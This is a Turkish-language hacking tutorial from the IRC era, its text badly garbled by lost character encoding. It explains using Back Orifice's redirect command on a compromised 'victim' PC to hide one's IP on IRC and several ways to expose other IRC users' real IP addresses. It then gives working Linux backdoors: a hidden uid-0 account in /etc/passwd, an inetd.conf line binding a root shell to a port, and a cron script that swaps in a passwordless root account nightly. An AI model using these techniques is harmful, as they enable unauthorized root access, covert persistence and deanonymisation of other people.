You are on page 1of 6

ip gizleme bu yaz�da olduk�a de�i�ik ve yararl� bilgilerden bahsedece�iz. �ncelikle bir �o�umuz bo nun redir komutunu bilmiyor.

halbuki �ok i�e yar�yan bir komut. �lk olarak bu komutu ��renmi� olaca��z. �kinci olarak ipmizi saklamay�, ���nc� olarakta normalde yawa� ba�land���m�z bir servera h�zl� ba�lanmay� g�rece�iz. irc de tak�ld���m zamanlar ip spoof olay�na �ok merakl�yd�m. ��nk� IRC de bence �ok zevkli sawa�lar olurdu. bu sawa�larda galip ��kabilmenin en etkin yolu iyi bir nuke program� oldu�u kadar ip numaran� oldu�undan farkl� g�stermekti. ip spoof i�in proxy, wingate gibi yollar var. ama bir �o�unuz bu sefer anlataca��m olay� bilmiyordur. neyse aidata irc sunucusuna ba�lanmaya �al��yordum. bir s�redir isp im bu servera yawa� ba�lant� veriyordu. lagda s�r�nd���m zamanlar vard�. Bir g�n bo ile oynarken (bo yu ��renmenin en iyi yolu onu kendi bilgisayar�na kurmakt�r.) redir komutunu g�r�m. bu komut redirect port atar victim bilgisayara. bo nun help dosyas� bu �ek�lde yard�m veriyor bu komut hakk�nda; rediradd - adds a port redirection usage: rediradd inputport outputiport,udp example1: rediradd 33331 205.183.56.7:31337,u example2: rediradd 1001 207.213.15.11:23 note: if no output port is provided the input port is used. ben bunu okuyunca i�ime yarayaca��n� d��nerek denemey karar verdim. aidata serverine en h�zl� ba�lanabilecek isp tabiki aidata net idi. aidatan�n ip aral���n� bulup boclient( dos komut istemi erisyonu bo nun) ile sweep �ektim. bana bir kurban verdi. sonra irc.anet.net.tr adresinin dns numaras�n� ald�m. Boclientte adama host komutu ile ba�lan�p�unu yazd�m� rediradd 6667 195.174.85.12 paketlerin yerine ba�ar� ile ula�t���n� g�r�nce irc program�m� a��p komu sat�r�na /server 195.174.80.100 yazd�m. �ak i�te aidata news serverine ba�lanm�t�m. hemde lags�z.... �imdi gelelim a��klamaya. rediradd komutunda ilk 6667 ba�lanaca��m�z irc servera hangi portla ba�lanaca��m�z. ondan sonra gelen numara irc serverin dns numaras�. Sonraki /server 195.174.80.100 sat�r�nda ise normalde /server irc.anet.net.tr yazars�n�z. ama bo ile girip redir yapt���m� kurban�n ip numaras�n� (195.174.80.100) yazarsakta yine bu servera ba�lan�r�z. burada ya��t���m�z bir nevi proxy server a�mak oldu. bu durumda bize nuke atsalar kurban makine ��kecek siz hemen de�neceksiniz.ip adresimize nas�l bakarsalar baks�nlar kurban�n ipsini g�recekler. by tnt-x-treme irc ip ��renme pek �ok ki�inin bu sayfay� g�r�nce hehe onda ne var /dns yaz yeter dedi�in g�r�yor gibiyim. ama bu her irc server i�in ge�erli de�il. bir �ok de�i�ik ip bulma y�ntemi vard�r. Bu yaz�da bunlardan bahsedece�im. yaz�n�n bir b�l�m� Turkish scene bir b�l�m� TCG bir b�l�m� ise kendi y�ntemimdir. y�Ntem 1: en basit ip bulma y�ntemi. pek �ok irc serverda �al��r. komut �ok basit irc client program�n�zda komut sat�r�na " /dns phyton " yaz�n. Size ip sini verecektir. y�Ntem 2: nette g�rd���n�z bir insan�n hangi isp'den ba�land���n� anlama �zerine. irc'de vs. ip'leri iki �ekilde g�r�r�z: 1: 144.122.2.104 -> direkt ip'yi g�rebiliyoruz. 2: 166.new-york-11-12rs.ny.dial-access.att.net -> superonline'da, doruknet'te vs. vs. bircok isp'de de g�r�yoruz bu t�r IP'leri.. 2. �ekilde g�rm�sek vatanda��n IP'sini; msdos komut istemine ge�iyoruz ve: c:\windows>ping 166.new-york-11-12rs.ny.dial-access.att.net pinging 166.new-york-11-12rs.ny.dial-access.att.net [12.78.196.166] with 32 bytes

of data: reply from 12.78.196.166: bytes=32 time=1276ms ttl=21 reply from 12.78.196.166: bytes=32 time=1085ms ttl=21 reply from 12.78.196.166: bytes=32 time=919ms ttl=21 ping sonu�lar�n� g�r�yoruz, burada 12.78.196.166 vatanda��m�z�n ip'si. �imdi gelelim as�l b�l�me, Ip'sini buldu�umuz vatanda��n hangi isp'den ba�land���n� ya da hangi kurumdan oldu�unu ��renmek i�in, http://www.ripe.net/db/whois.html sitesine gidiyoruz, burdan search'e t�klay�p adam�n IP adresini yaziyoruz, i�te kar��m�zda vatanda��n hangi kurumdan nete ba�l� oldu�u duruyor y�Ntem 3: irc'de whois yapinca son octeti *** olan (ornek: 212.252.28.***) ornegin microsoft chatta var bu...adam/hatunlarin ipsini bulmak icin: once bi whois cekin: asagidaki ?'lar (aslinda gorulen fakat tarafimdan degistirilmis) sizin tarafinizdan gorunecek rakamlardir. *** olanlar ise gercekte goreceginiz rakamlardir(son octet'ler) /who herifinteki [whois..] information on herifinteki: [ident..] ? [name...] ? [isp....] 212.252.85.*** [server.] irc.microsoft.com.tr gibi bir sey [info...] ? [idle...] 21secs demek ki herifintekinin ip'sini bilmiyoruz..cunku son octet *** ba$layin: /who 212.252.85.1* --> eger herifin adi yoksa 1 yerine 2 deneyin.. 3 deyin debeleyin..9 a kadar ...olana kadar... diyelim ki 2* da bulduk, o zaman: /who 212.252.85.20* deneyin..20* den 29* a kadar..ve yine diyelim ki 22* de buldunuz o zaman: /who 212.252.85.200 : sonra 201,202...,209 diyelim ki 204'te buldunuz: o zaman ip=???.???.???.67.224'tur.o kadar... y�Ntem 4: irc'de ip spoof yaparak millete sald�ranlar�n say�s� art�yor. kullan�c�n�n ip'sine bakt���n�zda manas�z bilgiler g�r�yorsunuz. peki kullan�c�n�n ger�ek ip'si nas�l al�n�r? 1- �ncelikle muhatab�m�z� bir ��renelim. /whois jp whois'e gelen cevap jp@this.is.a.spoofed.adres.com 2- /dns this.is.a.spoofed.adres.com komutuna cevap olarak hostmask does not resolve mesaj� al�yorsak muhatab�m�z ger�ekten ip spoof yap�yor demektir. 3- /quote userip jp komutuyla kar��m�za ne ��k�yor Jp=+jp@130.49.71.21 �te bu ger�ek ip adresi. (130.49.71.21) y�Ntem 5: bu y�ntem yine ip nin son octeti gizlenmi� ipler i�in ge�erli. �rene�in adam�m�z�n nicki lamer ve ipsi 193.192.110.*** diye g�z�k�yor. bu tip iplerde server gizlemi�tir. yani yine serverda kay�tl� ger�e ip vard�r.!!! bunu ��renmek i�in chanserv kullanaca��z. ancak bu y�ntem i�in adam�m�z�n nickini register etmi� olmas� laz�m. �imdi gidip denemelerimiz i�n bir kanal a�al�m. Kanal�m�z�n ismi #1 olsun. adam�m�z� se�tik. "lamer" chanserve bu adm� kobay kanal�m�za founder yapmas�n� istiyoruz. kanala girip kendimizi founder yapal�m. Daha sonra kanal�n founderi olarak bu lameri atay�n. En son olarakta /cs info #1 diyerek kanal�n founderi hakk�nda bilgi al�n. �et bu kadar adamm�z�n ger�ek ipsi ekranda ))) backdoor nedir, nas�l Kullan�l�r (b�l�m i). (merhaba!!! bu seferki yaz�m�n konusu arka kap�lar, size birka� arka kap� g�sterece�im. �ok kar��k olmayanlar�ndan, yani kendi linux'�n�zde yaz�y� okur okumaz deneyebilirsiniz, ve ayr�ca g�sterece�im arka kap�lardan yola ��k�p hayal

g�c�n�z� de kullanarak, �ok ho� arka kap�lar yapabilirsiniz..yaln�z arka kap�lar "root" elde etmek i�in de�ildir. arka kap�lar �ok �al��p zorla elde etti�iniz "root"'u sistemde g�venlik delikleri olu�turarak bir sonraki geri d�n��n�z i�in elinizde tutman�z i�indir. herneyse, diyelim ki �ok aceleniz var ve hemen bir arka kap� olu�turmak istiyorsunuz. /etc/passwd dosyas�n� hemen bir programla a��p ortalar�na bir yere ��phe �ekmeyecek bir root hesab� ekleyin ya da dosyan�n derinlerinde bir yerlerde sistem y�neticisinin daha �nceden dondurdu�u bir hesab�n uid'ini 0 yap�n ve * i�aretini kald�r�n. bunlar zorunlu kalmad�k�a kullan�lmamas� gereken y�ntemlerdir ve sistem y�neticisinin en �abuk fark edece�i kap�lard�r. bu y�zden zorunlu kalmadik�A kullanmayin!!! �imdi geldik bir inetd.conf arka kap�s�na! ama en e�lencelisini sona saklad�m..hehe... inetd, sistemin portlar�n� y�kleyen bir programd�r ve ayn� zamanda arka kap�lar i�in de �ok uygundur. ger�i /etc/inetd.conf dosyas�nda de�i�iklik yap�larak yarat�lan arka kap�lar�n ya�am s�resi sistem y�neticisine g�re de�i�ir. pek uzun ya�ayacaklar�n� hi� sanm�yorum; fakat denemeye de�er. a�a��da kendi bilgisayar�mdaki linux'den ald���m bir /etc/inetd.conf �rne�i var. (tabii ki hepsi de�il...) #ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a #telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd #gopher stream tcp nowait root /usr/sbin/tcpd gn #nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd #shell stream tcp nowait root /usr/sbin/tcpd in.rshd #login stream tcp nowait root /usr/sbin/tcpd in.rlogind #exec stream tcp nowait root /usr/sbin/tcpd in.rexecd #talk dgram udp wait root /usr/sbin/tcpd in.talkd #ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd #dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd #pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d #pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d #imap stream tcp nowait root /usr/sbin/tcpd imapd #uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l #tftp dgram udp wait root /usr/sbin/tcpd in.tftpd #bootps dgram udp wait root /usr/sbin/tcpd bootpd finger stream tcp nowait root /usr/sbin/tcpd in.fingerd -l #cfingerstream tcp nowait root /usr/sbin/tcpd in.cfingerd #systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx #netstatstream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet #time stream tcp nowait nobody /usr/sbin/tcpd in.timed #time dgram udp wait nobody /usr/sbin/tcpd in.timed #auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o # i�areti linux'e o sat�r� okumamas�n� sa�l�yor. g�rd���n�z gibi benim sadece telnet ve finger portlar�m a��k. asl�nda normalde ben hi� bir portumu a��k b�rakmam, ama bu aralar a��k i�te �imdi "bunlarda nedir?" diye soracaks�n�z. telnet'i ele alal�m. Sat�rdaki birinci b�l�m �al�t�r�lacak daemon'un, yani, program�n ismidir. �kinci b�l�mdeki stream socket tipidir. tcp'nin socketi stream ,udp'ninkiyse dgram. sonraki b�l�mde ise protocol ismini g�r�yorsunuz. sonraki b�l�mdeyse program�n hangi kullan�c� t�r� olarak �al�aca�� belirlenir. yani telnet root (uid=0) olarak �al�acak. be�inci b�l�mde ise program�n bulundu�u dizin var; fakat benim inetd.conf dosyamda /usr/sbin/tcpd'yi g�r�yorsunuz. tcpd g�venlik i�in baz� bilgileri kaydeden bir daemon oldu�una g�re, burada telnetin hareketleri normalde oldu�undan fazla kaydediliyor. son b�l�mdeyse daemonun paremetreleriyle beraber ger�ek ismini g�r�yorsunuz. bir de daemonlar�n hangi portlar� ve protocolleri kulland���n� i�eren /etc/services dosyas� vard�r. Bu dosya sayesinde 23 olan telnet portunu, 7000 yapabiliriz a�a��da bir services �rne�i var: tcpmux 1/tcp # rfc-1078 echo 7/tcp

echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp domain 53/udp mtp 57/tcp # deprecated bootps 67/udp # bootp server bootpc 68/udp # bootp client tftp 69/udp gopher 70/tcp # gopher server rje 77/tcp finger 79/tcp http 80/tcp # www is used by some broken www 80/tcp # progs, http is more correct link 87/tcp ttylink kerberos 88/udp kdc # kerberos authentication--udp kerberos 88/tcp kdc # kerberos authentication--tcp supdup 95/tcp # bsd supdupd( hostnames 101/tcp hostname # usually to sri-nic iso-tsap 102/tcp x400 103/tcp # iso mail x400-snd 104/tcp csnet-ns 105/tcp pop-2 109/tcp # postoffice v.2 pop-3 110/tcp # postoffice v.3 pop 110/tcp # postoffice v.3 sunrpc 111/tcp sunrpc 111/tcp portmapper # rpc 4.0 portmapper udp sunrpc 111/udp sunrpc 111/udp portmapper # rpc 4.0 portmapper tcp auth 113/tcp ident # user verification sftp 115/tcp uucp-path 117/tcp nntp 119/tcp usenet # network news transfer ntp 123/tcp # network time protocol ntp 123/udp # network time protocol netbios-ns 137/tcp nbns netbios-ns 137/udp nbns netbios-dgm 138/tcp nbdgm netbios-dgm 138/udp nbdgm netbios-ssn 139/tcp nbssn

imap 143/tcp # imap network mail protocol news 144/tcp news # window system nmp 161/udp snmp-trap 162/udp exec 512/tcp # bsd rexecd( biff 512/udp comsat login 513/tcp # bsd rlogind( who 513/udp whod # bsd rwhod( shell 514/tcp cmd # bsd rshd( syslog 514/udp # bsd syslogd( printer 515/tcp spooler # bsd lpd( talk 517/udp # bsd talkd( ntalk 518/udp # sunos talkd( efs 520/tcp # for lucasfilm route 520/udp router routed # 521/udp too timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc # experimental conference 531/tcp chat netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # bsd uucpd( uucp service klogin 543/tcp # kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs # brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental pcserver 600/tcp # ecd integrated pc board srvr mount 635/udp # nfs mount service pcnfs 640/udp # pc-nfs dos authentication bwnfs 650/udp # bw-nfs dos authentication kerberos-adm 749/tcp # kerberos 5 admin/changepw kerberos-adm 749/udp # kerberos 5 admin/changepw kerberos-sec 750/udp # kerberos authentication--udp kerberos-sec 750/tcp # kerberos authentication--tcp kerberos_master 751/udp # kerberos authentication kerberos_master 751/tcp # kerberos authentication krb5_prop 754/tcp # kerberos slave propagation listen 1025/tcp listener rfs remote_file_sharing nterm 1026/tcp remote_login network_terminal kpop 1109/tcp # pop with kerberos ingreslock 1524/tcp tnet 1600/tcp # transputer net daemon cfinger 2003/tcp # gnu finger nfs 2049/udp # nfs file service eklogin 2105/tcp # kerberos encrypted rlogin krb524 4444/tcp # kerberos 5 to 4 ticket xlator irc 6667/tcp # internet relay chat dos 7000/tcp msdos buraya istedi�inizi ekleyebilirsiniz. �rne�in; ircyi ele alal�m. Ba�taki "irc" s�zc��� /etc/inetd.conf'un i�inde yer alacak olan isim, 6667 port numaras�, tcp protokol tipi, # i�aretinden sonraki b�l�mse a��klamas�. Art�k bu anlatt�klar�mdan sonra, kap�y� nas�l koyaca��n�z� anlataca��m. kendi servisinizi y�kleyebilirsiniz ya da �nceden y�klenmi� bir servisi de�i�tirebilirsiniz. �rne�in, kurban�m�z time olsun. time stream tcp nowait nobody /usr/sbin/tcpd in.timed

time'�n port numaras� services dosyas�nda 37 olarak belirlendi�i i�in services dosyas�n� de�i�tirmeye gerek yok. �nemli olan son �� b�l�m. Kap�m�z�n root olarak �al�mas� �art oldu�u i�in nobody yerine root yaz�n. /usr/sbin/tcpd yerine /bin/sh yaz�n. Ve son olarak in.timed yerine sh -i yaz�n. Sat�r�n ayn� a�a��daki gibi olmas� gerekiyor: time stream tcp nowait root /bin/sh sh -i hepsi bu kadar! e�er isterseniz riske girip y�netici yerine siz "killall -hup inetd" yazarak dosyay� tekrar okutabilirsiniz ya da biraz bekleyebilirsiniz. �imdi tek yapaca��n�z port 37'ye telnet �ekmek. root olarak sistemde bulacaks�n�z kendinizi...heuehuhu...tek yapaca��n�z kap�n�z� /etc/services dosyas�na tan�tmak ve inetd.conf'a eklemek. �te size bir �rnek: inetd.conf --> filter stream tcp nowait root /bin/sh sh -i services --> filter 8000/tcp backdoor �te bu kadar. �imdi tek yapaca��n�z "killall -hup inetd" yaz�p, port 8000'e telnet �ekmek. hi� zor de�il...ama bu kap�lar daha �nce de dedi�im gibi hemen fark edilir. peki hangileri hemen fark edilmez? c dosyas� �eklinde olan truva atlar� tabii ki! ve son olarak /etc/crontab kap�lar�na geldik. sadece bir tane �rnek verece�im, ��nk� hayal g�c�n�z� kullanarak bir s�r� de�i�ik kap� �retebilirsiniz. crond istedi�iniz zamanda istedi�iniz i�lemi yapman�z� sa�layan �ok yararl� bir ara�t�r. �imdiki �rnekte, crond 30 saniyeli�ine beg�m isimli bir kullan�c�y� aktif hale getiriyor. basit ama etkili br �rnek. nas�l m� yapacaks�n�z? �ok basit, sadece /etc/crontab dosyas�na bir sat�r gireceksiniz ve birka� shell dosyas� yapacaks�n�z. tabii ki biraz unix bilginizin oldu�unu d��n�yorum. a�a��da crontab dosyas�ndaki alanlar�n a��klamalar� var: (1) (2) (3) (4) (5) (6) dakika saat g�n ay haftan�n�al�t�r�lacak komut ya da dosya 0-59 0-23 1-31 1-12 0-6g�n� �imdi /var/spool/crond/ ya da /var/spool/mail/ dizinlerinden biri mutlaka olacakt�r. Varsa /var/spool/crond/, yoksa /var/spool/mail/ dizininin i�ine gidip "begum" adl� bir dosya yarat�n ve bu dosyan�n i�ine �unlar� girin: 30 23 * * * sh /usr/bin/test sonra /usr/bin/ dizinine gidin ve test adl� bir dosya yarat�p �u de�i�iklikleri yap�n: cp /etc/passwd /etc/passwdd rm /etc/passwd cp /etc/tester /etc/passwd sleep 30 rm /etc/passwd cp /etc/passwdd /etc/passwd daha sonra /etc/'ye gidip tester adl� bir dosya yarat�p a�a��dakileri girin: begum::0:0:begum atac:/:/bin/bash �te arka kap�n�z haz�r! Her g�n saat 23:30'da 30 saniyeli�ine ger�ek passwd dosyas� yerine kendi begum isimli root hesab�m�z� aktif hale getiriyoruz! bu �ok basit ve bir �ok insan�n bildi�i bir kap�d�r. tabii ki hayal g�c�n�z sayesinde �ok daha karma��k ve iyilerini yaratabilirsiniz. hepsi bu kadar...size anlatt�klar�m� ba�ka yerlerde de okumu� olabilirsiniz. bana mail at�p kopyalad��m� s�ylemeyin! neden mi? ��nk� bunlar en �ok bilinen kap�lard�r, bu nedenle ba�kalar�n�n da anlatm� olmas� �ok normal! herneyse, belki ba�ka bir say�da kar��k arka kap� �rnekleri veririm, �imdilik bu kadar. __________________